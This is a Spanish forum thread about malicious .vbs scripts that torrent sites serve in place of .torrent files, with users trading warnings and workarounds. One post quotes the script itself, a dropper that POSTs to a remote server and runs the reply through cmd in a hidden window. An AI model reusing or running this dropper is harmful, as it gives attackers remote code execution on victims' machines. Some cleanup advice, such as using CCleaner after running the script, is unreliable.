Sobre los archivos .vbs y el torrent

Hola, he visto que ahora empiezan a aparecer estos archivos y quería saber si son seguros y como se abren.
Un saludo a todos [sati]
Y ¿como para que los quieres abrir?
totalmente seguros 100% real no fake 1 link.

no, básicamente son scripts que pueden contener contenido malicioso
;)
Esos archivos están apareciendo en paginas torrent,en algunos casos comprimidos en zip,rar...
Como dice el compañero son scripts maliciosos.
(mensaje borrado)
Me he fijado que ya hay páginas "graciosas" que te dicen que te descargues el fichero VBS "por seguridad", y que luego si eso te descargan el torrent... que no se yo para qué mierdas me tengo que bajar un script de VisualBasic pudiendome enlazar el .torrent que además ocupa menos. Ah, si, para meterme mierdaware ya sea para anuncios o minería... o las dos cosas.

Primero, que lo que se tendría que descargar (si no podemos tirar de magnet, que sería lo suyo) es descargarse el fichero con extension .torrent.

Todo lo que no sea un enlace .torrent, mejor mandarlo a la mierda.
si pero como bien dices están apareciendo en casi todas las páginas, sobretodo si buscas algo muy específico o de una cierta calidad (vamos que no te sirve cualquier opción)
yo lo he pasado a texto y sale algo así:

Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
dim objHTTP
objHTTP.Open "POST", "http://82.111.231.131.static.cdnserver.in", False
objHTTP.Send
pimwgb2 = Wscript.ScriptName
CreateObject("Shell.Application").ShellExecute "c:\windows\system32\cmd",objHTTP.responseText & pimwgb2,pimwgb,"",0

imagino que borrando algo (ultíma linea) se podría aislar el enlace... [sati]
@mingui el caso es que en la web mejortorrent por ejemplo todos los archivos de descarga son zips con esos archivos, siguen actualizando la web y poniendo nuevo contenido y no puedes bajar nada. No entiendo el sentido. ¿Convertir maquinas zombie?
anabela111023 escribió:imagino que borrando algo (ultíma linea) se podría aislar el enlace... [sati]


¿Pero qué enlace? Si eso es claramente un servidor C&C (bueno, igual C&C, estrictamente, no). Ese .vbs es un dropper para que empiece "la fiesta".

Un torrent es un .torrent y punto. Visto lo visto, dejad de usar mejortorrent y similares.
JohnH escribió:
anabela111023 escribió:imagino que borrando algo (ultíma linea) se podría aislar el enlace... [sati]


¿Pero qué enlace? Si eso es claramente un servidor C&C (bueno, igual C&C, estrictamente, no). Ese .vbs es un dropper para que empiece "la fiesta".

Un torrent es un .torrent y punto. Visto lo visto, dejad de usar mejortorrent y similares.

Que la renombren a peortorrent

La verdad yo para arriesgsrme a edtas cosas lo mejor es qbittorrent con su buscador integrado y ya para las las páginas fiables descargar con el programa via rss
@bikooo2
pues mira, un millón de gracias, me has abierto un nuevo universo
y en general muchas gracias a todos [sati]
anabela111023 escribió:Hola, he visto que ahora empiezan a aparecer estos archivos y quería saber si son seguros y como se abren.
Un saludo a todos [sati]

El unico archivo "torrent" que deberías descargarte son aquellos que terminan en .torrent, si quieres descargar de la web mejortorrent por ejemplo, ponte un plugin VPN en Firefox por ejemplo y ya cuando te vayas a descargar lo que sea no te descargará esos "archivos" .VBS (archivos que son scripts y te van a "cascar" el PC si o si).

Asi a grandes rasgos.. recuerda:

- Usa un "bloqueador de anuncios" como puede ser uBlock
- Usa un bloqueador de ventanas emergentes, como Strict Pop-up Blocker
- Usa un VPN, como Hoxx VPN

Ya está, hala, a disfrutar navegando :)
@Parallax Snake
Hola, otra magnífica aportación lo de la vpn. Lo acabo de probar y en efecto, así no te mete esos archivos y sí te redireccionan al torrent auténtico.
ahora lo que me gustaría saber es como descubrís cosas así?
[sati]
anabela111023 escribió:@Parallax Snake
Hola, otra magnífica aportación lo de la vpn. Lo acabo de probar y en efecto, así no te mete esos archivos y sí te redireccionan al torrent auténtico.
ahora lo que me gustaría saber es como descubrís cosas así?
[sati]

Bueno, en mi caso... probando, y claro, sabiendo que cuando te quieres bajar un torrent solo tienes que bajarte el torrent (.torrent), cualquier otra cosa... ni se te ocurra abrirlo ni nada ya que lo mas probable es que sea algo que te vaya a "cascar" el PC, con todas las demás cosas... lo mismo, tener claro exactamente que quieres bajarte y ya está, (imaginate que te quieres bajar un archivo .jpg de donde sea y resulta que te has bajado un .zip con varios archivos aparte del .jpg, pues a mi personalmente no se me ocurriría abrir nada que no fuera el .jpg que quería), como siempre digo... "el mejor antivirus eres tu".

Un saludo :)
Parallax Snake escribió:
anabela111023 escribió:@Parallax Snake
Hola, otra magnífica aportación lo de la vpn. Lo acabo de probar y en efecto, así no te mete esos archivos y sí te redireccionan al torrent auténtico.
ahora lo que me gustaría saber es como descubrís cosas así?
[sati]

Bueno, en mi caso... probando, y claro, sabiendo que cuando te quieres bajar un torrent solo tienes que bajarte el torrent (.torrent), cualquier otra cosa... ni se te ocurra abrirlo ni nada ya que lo mas probable es que sea algo que te vaya a "cascar" el PC, con todas las demás cosas... lo mismo, tener claro exactamente que quieres bajarte y ya está, (imaginate que te quieres bajar un archivo .jpg de donde sea y resulta que te has bajado un .zip con varios archivos aparte del .jpg, pues a mi personalmente no se me ocurriría abrir nada que no fuera el .jpg que quería), como siempre digo... "el mejor antivirus eres tu".

Un saludo :)

Sparte están los enlace magnet que a saber si esa web los usa
bikooo2 escribió:Sparte están los enlace magnet que a saber si esa web los usa


Sí, pero, y perdón por el off-topic, con los magnet no sabes lo que te estás bajando hasta que no empieza a descargar, ni tampoco puedes seleccionar qué archivos bajar si es un torrent multi-archivo y sólo te interesa uno.

Por comparar con los enlaces ed2k, al menos con la red ed2k tienes páginas que te ayudan a verificar qué es usando el hash. En la red bittorrent, que yo sepa, no existe esto (aunque hay buscadores que te permiten buscar por hash), empezando porque el enlace magnet ni siquiera contiene el hash hasta que, como he dicho, no añades el enlace.

No sé, a mí no me gusta bajarme cosas a ciegas y no me gustan los magnet. Ya sabes, por aquello de que no sabes a dónde te están llevando que, por poner un símil, es como los acortadores de url, no sabes dónde te llevan, aunque con los acortadores, al menos, hay técnicas para saberlo. Con los magnet no.

Perdón por el off-topic y la verborrea.
JohnH escribió:
bikooo2 escribió:Sparte están los enlace magnet que a saber si esa web los usa


Sí, pero, y perdón por el off-topic, con los magnet no sabes lo que te estás bajando hasta que no empieza a descargar, ni tampoco puedes seleccionar qué archivos bajar si es un torrent multi-archivo y sólo te interesa uno.

Por comparar con los enlaces ed2k, al menos con la red ed2k tienes páginas que te ayudan a verificar qué es usando el hash. En la red bittorrent, que yo sepa, no existe esto (aunque hay buscadores que te permiten buscar por hash), empezando porque el enlace magnet ni siquiera contiene el hash hasta que, como he dicho, no añades el enlace.

No sé, a mí no me gusta bajarme cosas a ciegas y no me gustan los magnet. Ya sabes, por aquello de que no sabes a dónde te están llevando que, por poner un símil, es como los acortadores de url, no sabes dónde te llevan, aunque con los acortadores, al menos, hay técnicas para saberlo. Con los magnet no.

Perdón por el off-topic y la verborrea.

Bueno, cuando añades un torrent al cliente torrent si tienes marcada la opción correspondiente puedes elegir que te quieres bajar del torrent, o sea, el enlace torrent es solo 1 enlace y el cliente torrent te muestra lo que contiene ese torrent, y luego puedes seleccionar lo que te quieras bajar :) , esa opción que si tiene por ejemplo qbitorrent, bittorrent o utorrent (por decir algunos), es muy util para descargar de sitios "no demasiado confiables", o para no bajarte lo que no quieras de ese torrent, por ejemplo que incluya varios archivos y no te quieras bajar uno o varios de ellos.

PD: mejortorrent no tiene magnets
yo es que la opción esa de que me muestre mlo que hay en el torrent la tengo quitada por que normalmente se lo que tiene el torrent y si tiene cosas que no me interesan en el programa es dos click y desactivas lo que no quieres que se descargue o borras el torrent si no es lo que buscabas
Parallax Snake escribió:Bueno, cuando añades un torrent al cliente torrent si tienes marcada la opción correspondiente puedes elegir que te quieres bajar del torrent, o sea, el enlace torrent es solo 1 enlace y el cliente torrent te muestra lo que contiene ese torrent, y luego puedes seleccionar lo que te quieras bajar :) , esa opción que si tiene por ejemplo qbitorrent, bittorrent o utorrent (por decir algunos), es muy util para descargar de sitios "no demasiado confiables", o para no bajarte lo que no quieras de ese torrent, por ejemplo que incluya varios archivos y no te quieras bajar uno o varios de ellos.

PD: mejortorrent no tiene magnets


Ya, sí, esa opción la tengo siempre activada (que, por cierto, lo he mencionado, entre líneas), pero con los magnet no funciona, que es de lo que estoy hablando.

Un enlace magnet, hasta que no empiezas a descargar, no sabes qué te está "invitando" a descargar. Confías en la buena fe de quien ha puesto el enlace. Y no es la buena fe, es que no puedes seleccionar qué, en una descarga multi-archivo.
bikooo2 escribió:yo es que la opción esa de que me muestre mlo que hay en el torrent la tengo quitada por que normalmente se lo que tiene el torrent y si tiene cosas que no me interesan en el programa es dos click y desactivas lo que no quieres que se descargue o borras el torrent si no es lo que buscabas

Yo tambien la tengo quitada, mas que nada porque de donde me descargo las cosas son lugares "de confianza", aun así... siempre miro que se está bajando, obviamente.

JohnH escribió:Ya, sí, esa opción la tengo siempre activada (que, por cierto, lo he mencionado, entre líneas), pero con los magnet no funciona, que es de lo que estoy hablando.

Un enlace magnet, hasta que no empiezas a descargar, no sabes qué te está "invitando" a descargar. Confías en la buena fe de quien ha puesto el enlace. Y no es la buena fe, es que no puedes seleccionar qué, en una descarga multi-archivo.

Bueno, que se empiece a descargar lo que sea, o que se haya descargado lo que sea da igual, si la cuestión es saber lo que has descargado, y no "ejecutar" NUNCA, BAJO NINGUN CONCEPTO, archivos "extraños", por ejemplo, ¿has ido a buscar un archivo de video?, pues si hay dentro de un .rar por ejemplo, varios archivos .vba, .exe, .reg ... etc, coges solo el archivo .mkv (por decir uno), y los demás directamente los borras del todo, que no por haberte bajado algo ya "estás infectado", como no lo ejecutes... no pasa nada, lo borras del todo y a otra cosa mariposa, ahora bien, si te "pica la curiosidad" y "ejecutas" esos archivos extraños por el "a ver que es eso"... la cagas si o si, eso que vaya por delante vaya, sin lugar a dudas :P , por eso mismo sigo diciendo que el mejor antivirus es uno mismo :) , hay que saber lo que querías descargar y conocer un poquito como va la cosa, solo así puedes andar "esquivando" todas estas historias :) ¿no creeis?
@Parallax Snake

No me estás entendiendo.

Yo sé perfectamente qué ejecutar y qué no, que uno ya tiene más que canas en esto. Esa no es la cuestión.

La cuestión es que con un magnet no puedes elegir qué descargar en una descarga multi-archivo.

Tú dices, bah, que se descargue. Pues yo digo, bah, no me da la gana.

La principal razón, no me sobra el espacio en disco (y aunque fuera así). La segunda, que, salvo que haya cambiado (uso una versión vieja) los archivos reservan todo el espacio en disco (y no estoy hablando de la opción de configuración). Y, hasta que tienes la opción de elegir, estás llenando el disco con la primera descarga (que es entonces cuando se muestra el contenido del margnet (por decirlo de alguna manera), porque contactar con los peers, simplemente, no te muestra qué tiene el torrent) y esa descarga inicial puede ser del archivo más grande del torrent que pueden ser... pongamos, 6GB, por decir algo, y se haga un pre-allocate por ese espacio, que encima es un archivo, del total del torrent, que tú no quieres, porque quieres unos archivos que son de 10KB paralelos (supongamos unos .srt, porque el torrent es un video+subtitulos).

Esto a algunos les parecerá una tontería, pero ni tengo por qué bajar datos que no quiero, ni tengo que hacerlo a ciegas. Más la machacada en el pre-allocate al disco mecánico.

Lo de que no sabes qué te invita a descargar el magnet lo he puesto como algo extremo para ejemplificar el hecho de que un magnet no te permite conocer qué descargas. NO QUE EJECUTAS. Que eso ya es cosa de cada cual.

Esa es mi argumentación de por qué no me gustan los magnet. Podremos estar más o menos de acuerdo. Por supuesto.

Y perdón por el offt-topic, otra vez.
Pues el material que siguen subiendo cada día es real.

En este artículo/video, se describe un truco para seguir descargando con normalidad en una de las webs torrent más famosa. Supongo que solamente funcionará en esa web en concreto:
Cómo descargar archivos .torrent de mejortorrentt.org, evitando los archivos .zip (.vbs)

Ayuda Por favor!
He descargado y ejecutado un fichero vbs de la pag mejor torrent, de momento no he notado nada estraño en el ordenador y ya los he borrado. He mirado en el administrador de tareas y veo que no hay nada ejecutandose. Realmente no se como funcionan los virus, tendrian que verse como se ejecutan en el adm tareas? como los podria eliminar totalmente?
Gracias por adelanatdo
@JohnH
Pues yo al menos con qBitorrent, me pregunta donde descargarlos,y que archivos descargar, es el mismo menú que sale cuando abro un .torrent
wanapaki escribió:@JohnH
Pues yo al menos con qBitorrent, me pregunta donde descargarlos,y que archivos descargar, es el mismo menú que sale cuando abro un .torrent


Dependerá del cliente, entonces.

Eso sí, viendo un par de vídeos veo que tanto qBittorrent como Bittorrent, sí, puede que lo hagan, peeeero, tras conectar con el enjambre, lo lógico, porque el magnet no lleva ninguna información extra.

De cualquier manera, un magnet no deja de ser una descarga a ciegas, uses el cliente que uses. No hay forma de saber qué hasta que no te conectas.
@JohnH
Todos los clientes torrent te permiten ver que bajas, sea un link directo .torrent o via magnet, ciertamente magnet se tardara mas en poder mostrarte el contenido [y marcar que quieres se descarge] pues primero debe poder conectar con quien tenga todos los archivos para mostrar la lista, y por esa tardanza muchos simplemente dan el click en aceptar y lo que les salga; mala costumbre por cierto. De igual manera de donde esten usando el .torrent o la liga magnet te informa el contenido de lo que vas a bajar, ahi lo malo es que si usas sitios de poca confianza pues tendras 'sorpresitas' en tus descargas.


.
packo38 escribió:Ayuda Por favor!
He descargado y ejecutado un fichero vbs de la pag mejor torrent, de momento no he notado nada estraño en el ordenador y ya los he borrado. He mirado en el administrador de tareas y veo que no hay nada ejecutandose. Realmente no se como funcionan los virus, tendrian que verse como se ejecutan en el adm tareas? como los podria eliminar totalmente?
Gracias por adelanatdo


Pásale el CCleaner, algo te ha metido seguro, esos scripts no fallan.
@TRASTARO

Pero por qué siempre que se escribe una parrafada tiene que ocurrir algo y ese día no copias lo que escribes para no perderlo...

Bueno, escribía que mi cliente no hace eso. Por versión o lo que sea. En realidad, da igual, mi uso de torrent es casi nulo y en realidad me importa poco. Prefiero los torrent y ya.

Dejemos el off-topic que no tiene sentido desenterrar al muerto que ha despertado @wanapaki 2 meses después :-|

Si ahora se puede, pues ya está. No hay más que discutir. Todo aclarado.
@packo38 MalwareBites, DrWeb CuerIt!, o cualquier otro antimalware que se te ocurra.

Y un antivirus decente, como el Kaspersky Free o el Avira hubiesen evitado que eso te pasara. Cuando se dice que con el Windows Defender y un antimalware basta, se presupone que el usuario también pone de su parte.

Y si quieres estar seguro de que el sistema está limpio, formateo e instalación desde cero. Mano de santo.

Suerte.
Brutico escribió:@Flanders @Parallax Snake mejor añadir el buscador de mejor torrent con qbittorrent hilo_utorrent-alternativas-gratuitas_2082398_s400#p1748887305

Ateneis complemento de mejor torrent https://raw.githubusercontent.com/Mauri ... r/mejor.py


Ese plugin de búsqueda está roto. Apunta a http://www.mejortorrent.org y la dirección actual es http://www.mejortorrentt.org (con doble t).

Si te descargas el plugin, lo editas con notepad y le cambias la direccion vieja por la nueva y lo importáis desde qbitorrent, funciona perfectamente

Aquí lo tenéis:
https://anonfile.com/12c8V5h8oa/mejor_py


EDITO: Olvidadlo, no funciona bien.
La página original es la que termina en .io y esa te descarga únicamente el archivo .torrent y tiene enlaces magnet. Cualquier otra versión de la web no es "oficial" y puede tener regalitos.
@jnderblue ¿Seguro?
mejortorrent.io me da error
Odioregistrarme escribió:@jnderblue ¿Seguro?
mejortorrent.io me da error

Elite.
jnderblue escribió:
Odioregistrarme escribió:@jnderblue ¿Seguro?
mejortorrent.io me da error

Elite.


elitetorrent.io me da error
Odioregistrarme escribió:
jnderblue escribió:
Odioregistrarme escribió:@jnderblue ¿Seguro?
mejortorrent.io me da error

Elite.


elitetorrent.io me da error

A mi con vodafone me va bien.
@Odioregistrarme Será algo de tu navegador, porque a mí me va bien (MasMovil).
Odioregistrarme escribió:
jnderblue escribió:
Odioregistrarme escribió:@jnderblue ¿Seguro?
mejortorrent.io me da error

Elite.


elitetorrent.io me da error

usa elitetorrent.nl
Parallax Snake escribió:
Odioregistrarme escribió:
jnderblue escribió:Elite.


elitetorrent.io me da error

usa elitetorrent.nl

Esa no es de elitetorrent, es otra copia. Los únicos originales son .li y .bz.
jnderblue escribió:
Parallax Snake escribió:
Odioregistrarme escribió:
elitetorrent.io me da error

usa elitetorrent.nl

Esa no es de elitetorrent, es otra copia. Los únicos originales son .li y .bz.

Elitetorrent.nl NO es una copia ya que al acceder a elitetorrent.li y elitetorrent.bz directamente entras en elitetorrent.nl , la que no es original de esa gente es la de elitetorrent.org por ejemplo, de hecho... ya ni existe.
Parallax Snake escribió:Elitetorrent.nl NO es una copia ya que al acceder a elitetorrent.li y elitetorrent.bz directamente entras en elitetorrent.nl , la que no es original de esa gente es la de elitetorrent.org por ejemplo, de hecho... ya ni existe.

Cierto, pues la han añadido hace poco [beer]
Una solución que me funciona en la mayoría de casos, es utilizar la extensión del Chrome !hola, con esta extensión tendremos un vpn proxy, me conecto desde otro país como EEUU, Andorra, Albania...etc. con ese sencillo truco, me libro de los archivos vbs y me descarga directamente los .torrent.

Me funciona en mejor torrent, gran torrent etc etc
Es curioso, pero desde hace unos días la página funciona sin sorpresas y sin tener que hacer trucos,para evitar los vbs... qué cosas.

Edito: Al menos, en mi caso, de tres intentos, tres enlaces .torrent al darle al enlace de turno.
43 respuestas